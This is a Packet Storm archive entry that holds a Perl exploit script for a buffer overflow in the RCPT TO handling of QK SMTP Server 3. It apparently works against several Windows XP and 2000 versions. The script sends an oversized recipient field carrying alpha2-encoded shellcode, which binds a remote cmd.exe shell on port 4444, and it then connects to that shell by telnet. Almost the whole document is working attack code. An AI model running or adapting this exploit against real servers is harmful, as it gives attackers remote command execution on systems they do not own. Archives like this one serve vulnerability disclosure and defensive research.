qksmtp.pl.txt

2007-01-02T00:00:00
ID PACKETSTORM:53347
Type packetstorm
Reporter acaro
Modified 2007-01-02T00:00:00

Description

                                        
                                            `#!/bin/perl  
#  
#http://www.securityfocus.com/bid/20681  
#  
# tested on winXp Pro SP0 English/winXp Pro SP2 Italian/win 2k SP4 Italian/English return address is universal  
# bind a remote cmd.exe on target host on 4444 port; based on expanders original exploit  
# credit to Greg Linares for discovered the vulnerability  
# thanks to hdm and vlads902 for original shellcode;encoded using Skylined alpha2 tool  
# Jacopo Cervini aka acaro [at] jervus.it  
  
  
if (@ARGV < 1) {  
print "--------------------------------------------------------------------\n";  
print "Usage : qksmtp-rcpt-overflow-4444.pl TargetIPAddress \n";  
print " Example : ./qksmtp-rcpt-overflow-4444.pl 127.0.0.1 \n";  
print "--------------------------------------------------------------------\n";  
}  
  
  
  
use IO::Socket::INET;  
  
my $host = shift(@ARGV);  
my $port = 25;  
my $reply;  
my $request;  
#my $eip="\x43\x43\x43\x43";   
  
my $eip="\x8f\x29\x46\x00"; #call esp in QKSmtpServer3.exe  
  
  
  
$sc=  
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZ".  
"BABABABABkMAGB9u4JBYlQZjKNmiXkIyokOkOOptKplmTo4RkQ5oL2kCLm5PxkQJORkPOLX4KOoKpIqjKOYtKP4DKkQZNp1upryVLqtWP".  
"44LGWQgZjmjaXBJKL4MkntktnHt5IURkqOnDkQzKqVRkLLNkRkQOMLM1xkm3NLTKQyBLO4mLoqy3lqIK34rkmsLptKQ0LL4KppmL4mdKM".  
"pKXOnaX4N0NLNjLNpKOz6ovOcRFOxlsOBphSGRSoBaOOdkOXPRH8KjMKLOKpPkO6vQOTIXeOve1JMm8JbnuqZKRkOHPbH7izizUvMPWYo".  
"6vnsOcQCb3PSMsNsOSNskOfp1VqXLQ1LrFnsu99QTUQXTdMJ2PewqGkOVvqZZpnqPUkOXPph3tTmNNZINwKO6vns0UKO6pOxIUoYBfa9r".  
"7Yo6vb00TOdR5YoHP3cRHgwRYGVbYnwkOJ6OeyoJ0s60j1T36OxqSrMU9jEozPPPYNIxLQyzGrJmtriYRnQGPZSdjkNORlmynMrnL63Bm".  
"PznXvKFKVKqXPrKNvSMFyoD5Mtyo6vqKPWPRPQoaNqbJkQpQpQoepQKOfpOxtmz9m58NNsiovv2JYoyoLw9oVpDK27ilqsvds4KOWfpRk".  
"OvpOxhp1zitOonsKOyFKO6pA";  
  
  
$jmpback = "\x50\x73".  
"\x54\x73".  
"\x58\x73".  
"\xb0".  
"\x48\x73".  
"\xb0\x48\x73".  
"\xb0\x48\x73".  
"\xb0\x48\x73".  
"\xb0\x48\x73".  
"\xb0\x48\x73".  
"\xb0\x48\x73".  
"\xb0\x48\x73".  
"\xb0\x48\x73".  
"\xb0\x48\x73".  
"\xb0\x48\x73".  
"\xb0\x48\x73".  
"\xb0\x48\x73".  
"\x40\x73".  
"\x40\x73".  
"\x40\x73".  
"\x40\x73".  
"\x40\x73".  
"\x40\x73".  
"\x40\x73".  
"\x50\x73".  
"\xc3\x73";  
  
my $buffer =("\x41"x296).$eip.("\x73"x2228).$sc.("\x45"x820).$jmpback."\x00";  
  
  
  
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);  
$socket or die "Cannot connect to host!\n";  
  
recv($socket, $reply, 1024, 0);  
print "Response:" . $reply;  
  
  
$request = "helo acaro" . "\r\n";  
send $socket, $request, 0;  
print "[+] Sent helo request\n";  
recv($socket, $reply, 1024, 0);  
print "Response:" . $reply;  
sleep(1);  
  
$request = "mail from: acaro@peaceandlove.peace" . "\r\n";  
send $socket, $request, 0;  
print "[+] Sent mail from request\n";  
recv($socket, $reply, 1024, 0);  
print "Response:" . $reply;  
sleep(1);  
  
$request = "rcpt to: " . $buffer . "\r\n";  
send $socket, $request, 0;  
print "[+] Sent rcpt to request\n";  
  
  
  
print " + connect on 4444 port of $host ...\n";  
sleep(3);  
system("telnet $host 4444");  
exit;  
`